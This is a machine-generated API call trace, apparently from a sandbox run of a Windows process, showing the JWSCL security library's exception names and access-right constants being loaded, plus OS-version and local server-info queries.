[0120.499] SysReAllocStringLen (in: pbstr=0x2adf5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2adf5e8*="EJwsclTerminalServiceNecessary") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2adf5d0*="EJwsclTerminalServiceException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2adf5b8*="EJwsclTerminalServerConnectException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2adf5a0*="EJwsclTerminalServerException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2adf588*="EJwsclCryptUnsupportedException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2adf570*="EJwsclCryptApiException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2adf558*="EJwsclCryptException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2adf540*="EJwsclOSError") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2adf528*="EJwsclResourceInitFailed") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2adf510*="EJwsclResourceUnequalCount") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2adf4f8*="EJwsclResourceNotFound") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2adf4e0*="EJwsclResourceException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2adf4c8*="EJwsclFailedAddACE") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2adf4b0*="EJwsclUnsupportedACE") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2adf498*="EJwsclOpenWindowStationException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2adf480*="EJwsclWindowStationException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2adf468*="EJwsclCloseDesktopException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2adf450*="EJwsclCreateDesktopException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2adf438*="EJwsclOpenDesktopException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2adf420*="EJwsclDesktopException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2adf408*="EJwsclSACLAccessDenied") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2adf3f0*="EJwsclAccessDenied") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2adf3d8*="EJwsclLSAException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2adf3c0*="ESetOwnerException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2adf3a8*="ESetSecurityException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2adf390*="EJwsclInvalidParentDescriptor") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2adf378*="EJwsclInvalidKeyPath") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2adf360*="EJwsclInvalidGenericAccessMask") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2adf348*="EJwsclAdaptSecurityInfoException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2adf330*="EJwsclThreadException") returned 1
[0120.499] SysReAllocStringLen (in: pbstr=0x2adf318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2adf318*="EJwsclInvalidObjectException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2adf300*="EJwsclSecurityObjectException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2adf2e8*="EJwsclHashMismatch") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2adf2d0*="EJwsclStreamHashException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2adf2b8*="EJwsclStreamInvalidMagicException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2adf2a0*="EJwsclStreamSizeException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2adf288*="EJwsclStreamException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2adf270*="EJwsclNoSuchLogonSession") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2adf258*="EJwsclInvalidFlagsException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2adf240*="EJwsclProcessNotFound") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2adf228*="EJwsclInvalidParameterException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2adf210*="EJwsclInvalidPathException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2adf1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2adf1e0*="EJwsclInvalidRevision") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2adf1c8*="EJwsclInvalidAceMismatch") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2adf1b0*="EJwsclRevisionMismatchException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2adf198*="EJwsclInvalidACEException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2adf180*="EJwsclReadOnlyPropertyException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2adf168*="EJwsclDuplicateListEntryException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2adf150*="EJwsclIndexOutOfBoundsException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2adf138*="EJwsclInvalidSidAuthorityValue") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2adf120*="EJwsclInvalidKnownSIDException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2adf108*="EJwsclInvalidComputer") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2adf0f0*="EJwsclInvalidGroupSIDException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2adf0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2adf0c0*="EJwsclInvalidSIDException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2adf0a8*="EJwsclInvalidSecurityListException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2adf090*="EJwsclInvalidMandatoryLevelException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2adf078*="EJwsclEmptyACLException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2adf060*="EJwsclNILParameterException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2adf048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2adf030*="EJwsclInvalidObjectArrayException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2adf018*="EJwsclProcessIdNotAvailable") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adf000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2adf000*="EJwsclWinCallFailedException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adefe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2adefe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adefd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2adefd0*="EJwsclNotImplementedException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adefb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2adefb8*="EJwsclAccessTypeException") returned 1
[0120.500] SysReAllocStringLen (in: pbstr=0x2adefa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2adefa0*="EJwsclAdjustPrivilegeException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2adef88*="EJwsclPrivilegeCheckException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2adef70*="EJwsclPrivilegeNotFoundException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2adef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2adef40*="EJwsclPrivilegeException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2adef28*="EJwsclNotEnoughMemory") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2adef10*="EJwsclInvalidTokenHandle") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adeef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2adeef8*="EJwsclNoThreadTokenAvailable") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adeee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2adeee0*="EJwsclDuplicateTokenException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adeec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2adeec8*="EJwsclInvalidOwnerException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adeeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2adeeb0*="EJwsclInvalidPrimaryToken") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2adee98*="EJwsclTokenPrimaryException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2adee80*="EJwsclTokenImpersonationException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2adee68*="EJwsclTokenInformationException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2adee50*="EJwsclSharedTokenException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2adee38*="EJwsclOpenProcessTokenException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2adee20*="EJwsclOpenThreadTokenException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2adee08*="EJwsclSecurityException") returned 1
[0120.501] SysReAllocStringLen (in: pbstr=0x2adedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2adedf0*="Exception") returned 1
[0120.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.501] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0120.501] GetVersionExA (in: lpVersionInformation=0x16f134*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x6a0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\\ñ\x16") | out: lpVersionInformation=0x16f134*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0120.501] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0120.501] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0120.508] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0120.508] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x16f1b8 | out: bufptr=0x16f1b8) returned 0x0
[0120.512] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0120.512] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0120.512] NetApiBufferFree (Buffer=0x6c1d00) returned 0x0
[0120.512] SetErrorMode (uMode=0x8000) returned 0x1
[0120.512] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0120.512] SetErrorMode (uMode=0x1) returned 0x8000
[0120.512] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.514] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.515] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.516] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.518] SysReAllocStringLen (in: pbstr=0x2adec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2adec40*="DELETE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2adec30*="READ_CONTROL") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2adec20*="WRITE_OWNER") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2adec10*="WRITE_DAC") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2adec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2adebf0*="FILE_READ_ATTRIBUTES") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2adebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2adebd0*="FILE_WRITE_DATA") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2adebc0*="FILE_READ_DATA") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2adebb0*="FILE_ALL_ACCESS") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2adeba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2adeb90*="STANDARD_RIGHTS_WRITE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2adeb80*="STANDARD_RIGHTS_READ") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2adeb70*="STANDARD_RIGHTS_ALL") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2adeb50*="DELETE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2adeb40*="READ_CONTROL") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2adeb30*="WRITE_OWNER") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2adeb20*="WRITE_DAC") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2adeb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2adeb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2adeaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2adeae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2adead0*="TOKEN_QUERY_SOURCE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2adeac0*="TOKEN_QUERY") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2adeab0*="TOKEN_IMPERSONATE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adeaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2adeaa0*="TOKEN_DUPLICATE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2adea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2adea80*="TOKEN_ALL_ACCESS") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2adea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2adea60*="STANDARD_RIGHTS_WRITE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2adea50*="STANDARD_RIGHTS_READ") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2adea40*="STANDARD_RIGHTS_ALL") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2adea30*="DELETE") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2adea20*="READ_CONTROL") returned 1
[0120.518] SysReAllocStringLen (in: pbstr=0x2adea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2adea10*="WRITE_OWNER") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2adea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2adea00*="WRITE_DAC") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2ade9f0*="TIMER_MODIFY_STATE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2ade9e0*="TIMER_QUERY_STATE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2ade9d0*="TIMER_ALL_ACCESS") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade9a0*="STANDARD_RIGHTS_READ") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade990*="STANDARD_RIGHTS_ALL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade980*="DELETE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade970*="READ_CONTROL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade960*="WRITE_OWNER") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade950*="WRITE_DAC") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2ade940*="SECTION_EXTEND_SIZE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2ade930*="FILE_MAP_READ") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2ade920*="FILE_MAP_WRITE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2ade910*="FILE_MAP_COPY") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2ade900*="FILE_MAP_ALL_ACCESS") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade8d0*="STANDARD_RIGHTS_READ") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade8c0*="STANDARD_RIGHTS_ALL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade8b0*="DELETE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade8a0*="READ_CONTROL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade890*="WRITE_OWNER") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade880*="WRITE_DAC") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2ade870*="MUTEX_MODIFY_STATE") returned 1
